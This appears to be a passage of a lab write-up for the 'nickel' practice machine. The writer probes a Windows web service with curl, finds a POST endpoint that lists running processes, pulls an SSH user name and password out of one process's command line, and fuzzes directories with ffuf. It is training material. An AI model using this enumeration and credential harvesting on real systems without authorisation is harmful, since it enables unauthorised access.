Web


Nmap discovered a Web server on the target port 33333 The running service is Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ curl -i http://$IP:33333/
HTTP/1.1 200 OK
Content-Length: 13
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 05 Mar 2025 17:55:13 GMT
 
Invalid Token

Webroot Is the web server expecting a token?

Hidden Endpoints


Checking the endpoints discovered by the web application on the target ports 8089 None of them support GET request Given the current web server only supports GET and POST, I will try POST

POST


N/A for the /list-current-deployments endpoint

N/A for the list-active-nodes endpoint

200 for the /list-running-procs endpoint

/list-running-procs endpoint


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ curl -X POST http://$IP:33333/list-running-procs -H 'Content-Length: 0'           
 
 
name        : System Idle Process
commandline : 
 
name        : System
commandline : 
 
name        : Registry
commandline : 
 
name        : smss.exe
commandline : 
 
name        : csrss.exe
commandline : 
 
name        : wininit.exe
commandline : 
 
name        : csrss.exe
commandline : 
 
name        : winlogon.exe
commandline : winlogon.exe
 
name        : services.exe
commandline : 
 
name        : lsass.exe
commandline : C:\Windows\system32\lsass.exe
 
name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"
 
name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"
 
name        : dwm.exe
commandline : "dwm.exe"
 
name        : Memory Compression
commandline : 
 
name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
 
name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1
 
name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1
 
name        : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"
 
name        : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"
 
name        : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
 
name        : vm3dservice.exe
commandline : C:\Windows\system32\vm3dservice.exe
 
name        : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
 
name        : vm3dservice.exe
commandline : vm3dservice.exe -n
 
name        : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
 
name        : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
 
name        : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe
 
name        : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa3956855 /state1:0x41c64e6d
 
name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
 
name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
 
name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
 
name        : MicrosoftEdgeUpdate.exe
commandline : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c
 
name        : SgrmBroker.exe
commandline : 
 
name        : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding

While sending a POST request to the /list-running-procs endpoint lists out the running processes, there is a credential exposure. The full command is: cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh The credential, ariah:Tm93aXNlU2xvb3BUaGVvcnkxMzkK, appears to be a SSH credential for the nickel-dev host.

Additionally, these 3 commands appear to be responsible for the web servers on the ports 80, 8089 and 33333

Fuzzing


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP:33333/FUZZ -ic -fs 16
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.219.99:33333/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 16
________________________________________________
:: Progress: [20478/20478] :: Job [1/1] :: 1626 req/sec :: Duration: [0:00:13] :: Errors: 0 ::
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP:33333/FUZZ/ -ic -fs 16
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.219.99:33333/FUZZ/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 16
________________________________________________
:: Progress: [207630/207630] :: Job [1/1] :: 1600 req/sec :: Duration: [0:02:12] :: Errors: 0 ::

N/A